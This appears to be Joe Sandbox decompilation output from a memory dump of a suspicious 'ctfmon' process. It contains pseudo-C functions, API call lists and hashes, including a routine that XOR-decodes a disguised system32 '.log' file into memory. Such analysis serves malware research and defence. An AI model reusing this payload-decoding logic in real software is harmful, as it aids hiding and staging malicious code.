                                                					_t36 = E00964E60("C:\\Windows\\system32\\msvcwme.log",  &_v84,  &_v76);
                                                					_t79 = _t79 + 4;
                                                					if(_t36 == 0) {
                                                						goto L1;
                                                					} else {
                                                						_t67 = _v76;
                                                						_t41 = _v80 + 0x2c + _t67;
                                                						 *0x996a40 = _t41;
                                                						_t42 = LocalAlloc(0x40, _t41);
                                                						asm("xorps xmm0, xmm0");
                                                						 *0x996a44 = _t42;
                                                						_t43 = 0;
                                                						asm("movq [esp+0x44], xmm0");
                                                						_v68 = _t67;
                                                						asm("movups [esp+0x24], xmm0");
                                                						_v64 = 0x77;
                                                						asm("movups [esp+0x34], xmm0");
                                                						if(_t67 != 0) {
                                                							_t64 = _v84;
                                                							if(_t67 >= 0x20) {
                                                								asm("movaps xmm1, [0x98cfa0]");
                                                								_t75 = _t67 - (_t67 & 0x0000001f);
                                                								_t60 = _t64 + 0x10;
                                                								do {
                                                									asm("movups xmm0, [ecx-0x10]");
                                                									_t43 = _t43 + 0x20;
                                                									_t60 = _t60 + 0x20;
                                                									asm("pxor xmm0, xmm1");
                                                									asm("movups [ecx-0x30], xmm0");
                                                									asm("movups xmm0, [ecx-0x20]");
                                                									asm("pxor xmm0, xmm1");
                                                									asm("movups [ecx-0x20], xmm0");
                                                								} while (_t43 < _t75);
                                                							}
                                                							while(_t43 < _t67) {
                                                								 *(_t43 + _t64) =  *(_t43 + _t64) ^ 0x00000077;
                                                								_t43 = _t43 + 1;
                                                							}
                                                						}
                                                						E009647A0(_v84, _t67, _t67,  &_v60);
                                                						_t71 =  *0x996a44;
                                                						E00983DB0(_t71, _v72, _v80);
                                                						_t72 = _t71 + _v80;
                                                						E00983DB0(_t72, _v84, _t67);
                                                						asm("movups xmm0, [esp+0x2c]");
                                                						asm("movups [esi+edi], xmm0");
                                                						asm("movups xmm0, [esp+0x30]");
                                                						asm("movups [esi+edi+0x10], xmm0");
                                                						asm("movq xmm0, [esp+0x40]");
                                                						asm("movq [esi+edi+0x20], xmm0");
                                                						 *((intOrPtr*)(_t72 + _t67 + 0x28)) = _v28;
                                                						_pop(_t73);
                                                						return E00970A5D(_v8 ^ _t79 + 0x1c, _t73);
                                                					}
                                                				} else {
                                                					L1:
                                                					_pop(_t70);
                                                					return E00970A5D(_v8 ^ _t79, _t70);
                                                				}
                                                			}































                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,73B76490), ref: 0096AEB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID: /LU5/$C:\Windows\system32\msvcwme.log$w
                                                • API String ID: 3494564517-1529180872
                                                • Opcode ID: 957e1081d822afa64b6928e82731804fa7def0b0ffb41e02a937e3f82eaa3bf7
                                                • Instruction ID: 3fec84633386ec39cff48670d017ffebbaaca980c39bd9593d2b7ebc2aa82fbf
                                                • Opcode Fuzzy Hash: 957e1081d822afa64b6928e82731804fa7def0b0ffb41e02a937e3f82eaa3bf7
                                                • Instruction Fuzzy Hash: E541C1729187418BC711CF28D94166BB7E5BFD9308F045B0DF88967212EB31EA988B97
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E0097917C(void* __ecx) {
                                                				intOrPtr _t2;
                                                				void* _t4;
                                                				void* _t10;
                                                				void* _t11;
                                                				void* _t13;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t11 = __ecx;
                                                				_t16 = GetLastError();
                                                				_t10 = 0;
                                                				_t2 =  *0x990558; // 0x6
                                                				_t19 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t15 = E009778D0(_t11, 1, 0x364);
                                                					_pop(_t13);
                                                					if(_t15 != 0) {
                                                						_t4 = E00977F1D(_t13, __eflags,  *0x990558, _t15);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E00978F6A(_t13, _t15, 0x996690);
                                                							E00977848(_t10);
                                                							__eflags = _t15;
                                                							if(_t15 != 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t15);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t10);
                                                						L4:
                                                						E00977848();
                                                						L8:
                                                						SetLastError(_t16);
                                                					}
                                                				} else {
                                                					_t15 = E00977EC7(_t11, _t19, _t2);
                                                					if(_t15 != 0) {
                                                						L9:
                                                						SetLastError(_t16);
                                                						_t10 = _t15;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                				return _t10;
                                                			}











                                                APIs
                                                • GetLastError.KERNEL32(123,77109EB0,73B76490,00975D48,009778C5,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 00979181
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 009791EA
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 009791F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: 123
                                                • API String ID: 1452528299-2286445522
                                                • Opcode ID: 84c1ddd117fc2819d81a5fc59119c07cce5910b72627cc986a95903ac8e7d20e
                                                • Instruction ID: 48dfdff4320f145d6b8e39a58c27a833f5cd0fbee765b20210ee28d501a12c60
                                                • Opcode Fuzzy Hash: 84c1ddd117fc2819d81a5fc59119c07cce5910b72627cc986a95903ac8e7d20e
                                                • Instruction Fuzzy Hash: FE017D3724C6022FC7016B795CCDF2B262FDBC2371762C424F81DD6291EE648C119151
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E00977CDE(signed int _a4) {
                                                				signed int _t9;
                                                				void* _t13;
                                                				signed int _t15;
                                                				WCHAR* _t22;
                                                				signed int _t24;
                                                				signed int* _t25;
                                                				void* _t27;
                                                
                                                				_t9 = _a4;
                                                				_t25 = 0x9963a8 + _t9 * 4;
                                                				_t24 =  *_t25;
                                                				if(_t24 == 0) {
                                                					_t22 =  *(0x9862a0 + _t9 * 4);
                                                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                					if(_t27 != 0) {
                                                						L8:
                                                						 *_t25 = _t27;
                                                						if( *_t25 != 0) {
                                                							FreeLibrary(_t27);
                                                						}
                                                						_t13 = _t27;
                                                						L11:
                                                						return _t13;
                                                					}
                                                					_t15 = GetLastError();
                                                					if(_t15 != 0x57) {
                                                						_t27 = 0;
                                                					} else {
                                                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                						_t27 = _t15;
                                                					}
                                                					if(_t27 != 0) {
                                                						goto L8;
                                                					} else {
                                                						 *_t25 = _t15 | 0xffffffff;
                                                						_t13 = 0;
                                                						goto L11;
                                                					}
                                                				}
                                                				_t4 = _t24 + 1; // 0x35554c30
                                                				asm("sbb eax, eax");
                                                				return  ~_t4 & _t24;
                                                			}











                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00969C60,00000000,00000000,?,00977C85,00969C60,00000000,00000000,00000000,?,00977F44,00000006,FlsSetValue), ref: 00977D10
                                                • GetLastError.KERNEL32(?,00977C85,00969C60,00000000,00000000,00000000,?,00977F44,00000006,FlsSetValue,00986784,0098678C,00000000,00000364,?,009791CA), ref: 00977D1C
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00977C85,00969C60,00000000,00000000,00000000,?,00977F44,00000006,FlsSetValue,00986784,0098678C,00000000), ref: 00977D2A
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 9e4f7c648616cf339c63045a78980ed3b577921165c608f0e2b10e62068fba39
                                                • Instruction ID: 0a894f7502c652de9628b43e25bb2187d4d1170b22a2831029ca97d966309b13
                                                • Opcode Fuzzy Hash: 9e4f7c648616cf339c63045a78980ed3b577921165c608f0e2b10e62068fba39
                                                • Instruction Fuzzy Hash: C601D43761D622ABCB314AA8DC88A66B79CAF05BA57214A20ED09DB280D765DC0497E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00966440(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
                                                				intOrPtr* _v0;
                                                				intOrPtr* _v12;
                                                				void* __ebp;
                                                				signed int _t21;
                                                				intOrPtr* _t27;
                                                				signed int _t30;
                                                				signed int _t34;
                                                				void* _t35;
                                                				intOrPtr _t36;
                                                				signed int _t38;
                                                				intOrPtr* _t39;
                                                				void* _t40;
                                                				intOrPtr* _t41;
                                                				intOrPtr* _t42;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t46;
                                                				intOrPtr* _t47;
                                                				void* _t51;
                                                
                                                				_t46 = __esi;
                                                				_t43 = __edi;
                                                				_t40 = __edx;
                                                				_t35 = __ebx;
                                                				_t21 = _a4;
                                                				if(_t21 != 0) {
                                                					__eflags = _t21 - 0xffffffff;
                                                					if(__eflags > 0) {
                                                						E00971283(__eflags);
                                                						goto L10;
                                                					} else {
                                                						__eflags = _t21 - 0x1000;
                                                						if(__eflags < 0) {
                                                							_t21 = E00970A6E(__esi, __eflags, _t21);
                                                							_t51 = _t51 + 4;
                                                							__eflags = _t21;
                                                							if(__eflags != 0) {
                                                								goto L1;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t2 = _t21 + 0x23; // 0x9661ff
                                                							_t38 = _t2;
                                                							__eflags = _t38 - _t21;
                                                							if(__eflags <= 0) {
                                                								L10:
                                                								E00971283(__eflags);
                                                								goto L11;
                                                							} else {
                                                								_t38 = E00970A6E(__esi, __eflags, _t38);
                                                								_t51 = _t51 + 4;
                                                								__eflags = _t38;
                                                								if(__eflags == 0) {
                                                									L11:
                                                									E00975C20(_t35, _t38, _t40, _t43, __eflags);
                                                									L12:
                                                									E00975C20(_t35, _t38, _t40, _t43, __eflags);
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									_push(_t38);
                                                									_t41 =  *0x996a54;
                                                									_push(_t46);
                                                									_v12 = _t41;
                                                									_t47 =  *((intOrPtr*)(_t41 + 4));
                                                									__eflags =  *((char*)(_t47 + 0xd));
                                                									if( *((char*)(_t47 + 0xd)) == 0) {
                                                										_t27 = _v0;
                                                										_push(_t35);
                                                										_push(_t43);
                                                										_t9 = _t27 + 0x10; // 0x458be85d
                                                										_t36 =  *_t9;
                                                										do {
                                                											__eflags =  *((intOrPtr*)(_t27 + 0x14)) - 0x10;
                                                											_t39 = _t47 + 0x10;
                                                											if( *((intOrPtr*)(_t27 + 0x14)) < 0x10) {
                                                												_t42 = _t27;
                                                											} else {
                                                												_t42 =  *_t27;
                                                											}
                                                											__eflags =  *((intOrPtr*)(_t39 + 0x14)) - 0x10;
                                                											_t44 =  *((intOrPtr*)(_t39 + 0x10));
                                                											if( *((intOrPtr*)(_t39 + 0x14)) >= 0x10) {
                                                												_t39 =  *_t39;
                                                											}
                                                											__eflags = _t44 - _t36;
                                                											_t29 =  <  ? _t44 : _t36;
                                                											_t30 = E009651A0(_t39, _t42,  <  ? _t44 : _t36);
                                                											_t51 = _t51 + 4;
                                                											__eflags = _t30;
                                                											if(__eflags != 0) {
                                                												L23:
                                                												if(__eflags < 0) {
                                                													goto L25;
                                                												} else {
                                                													_t41 = _t47;
                                                													_t47 =  *_t47;
                                                													_v12 = _t41;
                                                												}
                                                											} else {
                                                												__eflags = _t44 - _t36;
                                                												if(_t44 < _t36) {
                                                													L25:
                                                													_t47 =  *((intOrPtr*)(_t47 + 8));
                                                													_t41 = _v12;
                                                												} else {
                                                													__eflags = _t44 - _t36;
                                                													__eflags = _t30 & 0xffffff00 | _t44 != _t36;
                                                													goto L23;
                                                												}
                                                											}
                                                											__eflags =  *((char*)(_t47 + 0xd));
                                                											_t27 = _v0;
                                                										} while ( *((char*)(_t47 + 0xd)) == 0);
                                                									}
                                                									return _t41;
                                                								} else {
                                                									_t3 = _t38 + 0x23; // 0x23
                                                									_t34 = _t3 & 0xffffffe0;
                                                									__eflags = _t34;
                                                									 *(_t34 - 4) = _t38;
                                                									return _t34;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return _t21;
                                                				}
                                                			}























                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e07a8dab52388ef84e1267da2bcfb90ce1d01131eeade51ba8bbd667723157b
                                                • Instruction ID: 882977065c8995f5907c72db9d98d5bb51457aba8f80dcef95a4509c928f22b5
                                                • Opcode Fuzzy Hash: 1e07a8dab52388ef84e1267da2bcfb90ce1d01131eeade51ba8bbd667723157b
                                                • Instruction Fuzzy Hash: A7F0277350030186AB28F7B58843B2E339C4EA0364B05873AF42DC71A2EE26E9908156
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00970F6C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t4;
                                                				void* _t6;
                                                				void* _t13;
                                                				void* _t15;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t28;
                                                
                                                				_t30 = __edi;
                                                				_t29 = __edx;
                                                				_t25 = __ecx;
                                                				_t24 = __ebx;
                                                				_push(__esi);
                                                				E00976EAF(1);
                                                				E0097730F(E0097173B());
                                                				_t4 = E00977536();
                                                				 *_t4 = E00971741();
                                                				_t6 = E00970B8C(__edx, __edi, _t4, 1);
                                                				_t37 = _t6;
                                                				if(_t6 == 0) {
                                                					L5:
                                                					E00971477(_t29, _t30, 7);
                                                					asm("int3");
                                                					E00971777();
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					asm("fclex");
                                                					E009717AC();
                                                					E00970D30(_t37, E009717D7);
                                                					_push(E00971737());
                                                					_t13 = E00977237(_t25, __edx);
                                                					_pop(_t27);
                                                					if(_t13 != 0) {
                                                						goto L5;
                                                					} else {
                                                						E00971744(_t13);
                                                						_t15 = E00971794();
                                                						_t39 = _t15;
                                                						if(_t15 != 0) {
                                                							_t15 = E00976F34(E00971741);
                                                							_pop(_t27);
                                                						}
                                                						E00971802(E00971802(_t15));
                                                						E00971750(_t29, _t30, _t39);
                                                						E0097749F(_t27, _t29, E00971741());
                                                						_pop(_t28);
                                                						L00976986(_t24, _t28);
                                                						E00971741();
                                                						return 0;
                                                					}
                                                				}
                                                			}












                                                APIs
                                                • ___scrt_initialize_onexit_tables.LIBCMT ref: 00970F8F
                                                • __RTC_Initialize.LIBCMT ref: 00970F9E
                                                  • Part of subcall function 00970D30: __onexit.LIBCMT ref: 00970D36
                                                  • Part of subcall function 00971744: InitializeSListHead.KERNEL32(00996158,00970FC3), ref: 00971749
                                                • ___scrt_fastfail.LIBCMT ref: 00971001
                                                • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 00971007
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
                                                • String ID:
                                                • API String ID: 3692885319-0
                                                • Opcode ID: ac0f0f69157a84438b62dd988d52b064c8047aafa3e42d4fa737887e0530a983
                                                • Instruction ID: 7fa61148db5aa3e4884227d21bad6601b53ecbf354e676175b773754da874b84
                                                • Opcode Fuzzy Hash: ac0f0f69157a84438b62dd988d52b064c8047aafa3e42d4fa737887e0530a983
                                                • Instruction Fuzzy Hash: 50F03A6355434293DA2C33FD5C4BBAE46890FC1765F24C814B99CAA0D3EE69D04450B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E00964E00(CHAR* __ecx, void* __edx, long _a4) {
                                                				long _v8;
                                                				int _t7;
                                                				void* _t14;
                                                				void* _t18;
                                                
                                                				_push(__ecx);
                                                				_t14 = __edx;
                                                				_v8 = 0;
                                                				_t18 = CreateFileA(__ecx, 0x40000000, 2, 0, 2, 0x80, 0);
                                                				if(_t18 == 0) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_t7 = WriteFile(_t18, _t14, _a4,  &_v8, 0);
                                                					_push(_t18);
                                                					if(_t7 != 0) {
                                                						CloseHandle();
                                                						return 1;
                                                					} else {
                                                						CloseHandle();
                                                						goto L3;
                                                					}
                                                				}
                                                			}








                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,00969845), ref: 00964E22
                                                • WriteFile.KERNEL32(00000000,00000000,00969845,00000000,00000000,?,00969845), ref: 00964E39
                                                • CloseHandle.KERNEL32(00000000,?,00969845), ref: 00964E44
                                                • CloseHandle.KERNEL32(00000000,?,00969845), ref: 00964E52
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID:
                                                • API String ID: 3602564925-0
                                                • Opcode ID: 2aec7062cff2a72fec5c6748e44a37f4dbecf2dbda25b5d3a86a27037fb1dfd7
                                                • Instruction ID: 69aea3a37f6a14e32729effdd5523a08cc17c7508fc7953da91c6839a2ae585d
                                                • Opcode Fuzzy Hash: 2aec7062cff2a72fec5c6748e44a37f4dbecf2dbda25b5d3a86a27037fb1dfd7
                                                • Instruction Fuzzy Hash: 98F0E9326A9614B7D7204B85AC0FFEB7B5CEB45B21F014195FE08D6280D7A19C0557F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00966950(void* __ebx, void* __edx, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr* _a20) {
                                                				intOrPtr* _v0;
                                                				intOrPtr* _v4;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr* _v28;
                                                				signed int _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				void* __edi;
                                                				void* __ebp;
                                                				intOrPtr _t133;
                                                				intOrPtr* _t135;
                                                				intOrPtr _t136;
                                                				intOrPtr* _t139;
                                                				intOrPtr* _t140;
                                                				intOrPtr _t146;
                                                				intOrPtr _t148;
                                                				intOrPtr* _t149;
                                                				intOrPtr _t150;
                                                				intOrPtr _t160;
                                                				intOrPtr _t162;
                                                				intOrPtr* _t163;
                                                				signed int _t171;
                                                				signed int _t174;
                                                				signed int _t177;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t181;
                                                				intOrPtr* _t185;
                                                				intOrPtr* _t186;
                                                				intOrPtr* _t190;
                                                				intOrPtr* _t191;
                                                				signed int _t194;
                                                				void* _t198;
                                                				intOrPtr* _t199;
                                                				intOrPtr _t200;
                                                				intOrPtr _t204;
                                                				intOrPtr _t205;
                                                				intOrPtr _t206;
                                                				intOrPtr* _t207;
                                                				intOrPtr* _t208;
                                                				void* _t209;
                                                				void* _t210;
                                                				intOrPtr* _t220;
                                                				intOrPtr _t221;
                                                				intOrPtr* _t223;
                                                				intOrPtr* _t224;
                                                				intOrPtr* _t225;
                                                				char _t226;
                                                				intOrPtr* _t228;
                                                				intOrPtr* _t230;
                                                				intOrPtr _t232;
                                                				char* _t233;
                                                				intOrPtr _t237;
                                                				intOrPtr* _t239;
                                                				char* _t241;
                                                				intOrPtr* _t242;
                                                				char _t243;
                                                				void* _t249;
                                                				signed int _t250;
                                                				intOrPtr _t251;
                                                				signed int _t264;
                                                
                                                				_t198 = __ebx;
                                                				_t133 =  *0x996a58;
                                                				_t230 = _a20;
                                                				if(_t133 < 0x5d1745c) {
                                                					 *0x996a58 = _t133 + 1;
                                                					_t135 = _a12;
                                                					 *((intOrPtr*)(_t230 + 4)) = _t135;
                                                					_t204 =  *0x996a54;
                                                					__eflags = _t135 - _t204;
                                                					if(_t135 != _t204) {
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							 *((intOrPtr*)(_t135 + 8)) = _t230;
                                                							_t205 =  *0x996a54;
                                                							__eflags = _t135 -  *((intOrPtr*)(_t205 + 8));
                                                							if(_t135 ==  *((intOrPtr*)(_t205 + 8))) {
                                                								 *((intOrPtr*)(_t205 + 8)) = _t230;
                                                							}
                                                						} else {
                                                							 *_t135 = _t230;
                                                							_t208 =  *0x996a54;
                                                							__eflags = _t135 -  *_t208;
                                                							if(_t135 ==  *_t208) {
                                                								 *_t208 = _t230;
                                                							}
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(_t204 + 4)) = _t230;
                                                						 *((intOrPtr*)( *0x996a54)) = _t230;
                                                						 *((intOrPtr*)( *0x996a54 + 8)) = _t230;
                                                					}
                                                					_t15 = _t230 + 4; // 0xc6088908
                                                					_t136 =  *_t15;
                                                					_t239 = _t230;
                                                					__eflags =  *((char*)(_t136 + 0xc));
                                                					if( *((char*)(_t136 + 0xc)) == 0) {
                                                						do {
                                                							_t17 = _t239 + 4; // 0xc6088908
                                                							_t140 =  *_t17;
                                                							_t223 =  *((intOrPtr*)(_t140 + 4));
                                                							_t206 =  *_t223;
                                                							__eflags = _t140 - _t206;
                                                							if(_t140 != _t206) {
                                                								__eflags =  *((char*)(_t206 + 0xc));
                                                								if( *((char*)(_t206 + 0xc)) != 0) {
                                                									__eflags = _t239 -  *_t140;
                                                									if(_t239 ==  *_t140) {
                                                										_t239 = _t140;
                                                										E00966300(_t239);
                                                									}
                                                									_t51 = _t239 + 4; // 0xc6088908
                                                									 *((char*)( *_t51 + 0xc)) = 1;
                                                									_t53 = _t239 + 4; // 0xc6088908
                                                									 *((char*)( *((intOrPtr*)( *_t53 + 4)) + 0xc)) = 0;
                                                									_t56 = _t239 + 4; // 0xc6088908
                                                									_t207 =  *((intOrPtr*)( *_t56 + 4));
                                                									_t224 =  *((intOrPtr*)(_t207 + 8));
                                                									 *((intOrPtr*)(_t207 + 8)) =  *_t224;
                                                									_t146 =  *_t224;
                                                									__eflags =  *((char*)(_t146 + 0xd));
                                                									if( *((char*)(_t146 + 0xd)) == 0) {
                                                										 *((intOrPtr*)(_t146 + 4)) = _t207;
                                                									}
                                                									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
                                                									_t148 =  *0x996a54;
                                                									__eflags = _t207 -  *((intOrPtr*)(_t148 + 4));
                                                									if(_t207 !=  *((intOrPtr*)(_t148 + 4))) {
                                                										_t149 =  *((intOrPtr*)(_t207 + 4));
                                                										__eflags = _t207 -  *_t149;
                                                										if(_t207 !=  *_t149) {
                                                											 *((intOrPtr*)(_t149 + 8)) = _t224;
                                                										} else {
                                                											 *_t149 = _t224;
                                                										}
                                                									} else {
                                                										 *((intOrPtr*)(_t148 + 4)) = _t224;
                                                									}
                                                									 *_t224 = _t207;
                                                									goto L36;
                                                								} else {
                                                									goto L25;
                                                								}
                                                							} else {
                                                								_t206 =  *((intOrPtr*)(_t223 + 8));
                                                								__eflags =  *((char*)(_t206 + 0xc));
                                                								if( *((char*)(_t206 + 0xc)) == 0) {
                                                									L25:
                                                									 *((char*)(_t140 + 0xc)) = 1;
                                                									 *((char*)(_t206 + 0xc)) = 1;
                                                									_t46 = _t239 + 4; // 0xc6088908
                                                									 *((char*)( *((intOrPtr*)( *_t46 + 4)) + 0xc)) = 0;
                                                									_t49 = _t239 + 4; // 0xc6088908
                                                									_t239 =  *((intOrPtr*)( *_t49 + 4));
                                                								} else {
                                                									__eflags = _t239 -  *((intOrPtr*)(_t140 + 8));
                                                									if(_t239 ==  *((intOrPtr*)(_t140 + 8))) {
                                                										_t239 = _t140;
                                                										E00966360(_t239);
                                                									}
                                                									 *((char*)( *((intOrPtr*)(_t239 + 4)) + 0xc)) = 1;
                                                									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4)) + 0xc)) = 0;
                                                									_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4));
                                                									_t224 =  *_t207;
                                                									 *_t207 =  *((intOrPtr*)(_t224 + 8));
                                                									_t160 =  *((intOrPtr*)(_t224 + 8));
                                                									__eflags =  *((char*)(_t160 + 0xd));
                                                									if( *((char*)(_t160 + 0xd)) == 0) {
                                                										 *((intOrPtr*)(_t160 + 4)) = _t207;
                                                									}
                                                									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
                                                									_t162 =  *0x996a54;
                                                									__eflags = _t207 -  *((intOrPtr*)(_t162 + 4));
                                                									if(_t207 !=  *((intOrPtr*)(_t162 + 4))) {
                                                										_t163 =  *((intOrPtr*)(_t207 + 4));
                                                										__eflags = _t207 -  *((intOrPtr*)(_t163 + 8));
                                                										if(_t207 !=  *((intOrPtr*)(_t163 + 8))) {
                                                											 *_t163 = _t224;
                                                											 *((intOrPtr*)(_t224 + 8)) = _t207;
                                                										} else {
                                                											 *((intOrPtr*)(_t163 + 8)) = _t224;
                                                											 *((intOrPtr*)(_t224 + 8)) = _t207;
                                                										}
                                                									} else {
                                                										 *((intOrPtr*)(_t162 + 4)) = _t224;
                                                										 *((intOrPtr*)(_t224 + 8)) = _t207;
                                                									}
                                                									L36:
                                                									 *((intOrPtr*)(_t207 + 4)) = _t224;
                                                								}
                                                							}
                                                							_t69 = _t239 + 4; // 0xc6088908
                                                							_t150 =  *_t69;
                                                							__eflags =  *((char*)(_t150 + 0xc));
                                                						} while ( *((char*)(_t150 + 0xc)) == 0);
                                                					}
                                                					 *((char*)( *((intOrPtr*)( *0x996a54 + 4)) + 0xc)) = 1;
                                                					_t139 = _a4;
                                                					 *_t139 = _t230;
                                                					return _t139;
                                                				} else {
                                                					_t2 = _t230 + 0x24; // 0x6afffffb
                                                					_t167 =  *_t2;
                                                					_t3 = _t230 + 0x10; // 0x966cb0
                                                					_t241 = _t3;
                                                					if( *_t2 >= 0x10) {
                                                						E00965CF0(__ebx, __edx, _t230,  *_t241, _t167 + 1);
                                                					}
                                                					 *((intOrPtr*)(_t241 + 0x14)) = 0xf;
                                                					 *((intOrPtr*)(_t241 + 0x10)) = 0;
                                                					if( *((intOrPtr*)(_t241 + 0x14)) >= 0x10) {
                                                						_t241 =  *_t241;
                                                					}
                                                					 *_t241 = 0;
                                                					L00970D45(_t230);
                                                					_t250 = _t249 + 4;
                                                					_push("map/set<T> too long");
                                                					E009718DF();
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(0xffffffff);
                                                					_push(E00984610);
                                                					_push( *[fs:0x0]);
                                                					_t251 = _t250 - 0xc;
                                                					_push(_t198);
                                                					_push(_t241);
                                                					_push(_t230);
                                                					_t171 =  *0x98f008; // 0x35554c2f
                                                					_push(_t171 ^ _t250);
                                                					 *[fs:0x0] =  &_v32;
                                                					_v36 = _t251;
                                                					_v24 = 0;
                                                					_t174 = 1;
                                                					_t225 =  *0x996a54;
                                                					_t209 = _t225;
                                                					_t199 = _v4;
                                                					_v40 = _t209;
                                                					_v44 = 1;
                                                					_t242 =  *((intOrPtr*)(_t225 + 4));
                                                					if( *((char*)(_t242 + 0xd)) == 0) {
                                                						do {
                                                							_t83 = _t242 + 0x10; // 0x12
                                                							_t228 = _t83;
                                                							_t237 =  *((intOrPtr*)(_t228 + 0x10));
                                                							_v28 = _t242;
                                                							if( *((intOrPtr*)(_t242 + 0x24)) >= 0x10) {
                                                								_t228 =  *_t228;
                                                							}
                                                							if( *((intOrPtr*)(_t199 + 0x14)) < 0x10) {
                                                								_t220 = _t199;
                                                							} else {
                                                								_t220 =  *_t199;
                                                							}
                                                							_t193 =  <  ?  *((void*)(_t199 + 0x10)) : _t237;
                                                							_t194 = E009651A0(_t220, _t228,  <  ?  *((void*)(_t199 + 0x10)) : _t237);
                                                							_t251 = _t251 + 4;
                                                							if(_t194 == 0) {
                                                								_t221 =  *((intOrPtr*)(_t199 + 0x10));
                                                								if(_t221 >= _t237) {
                                                									__eflags = _t221 - _t237;
                                                									_t91 = _t221 != _t237;
                                                									__eflags = _t91;
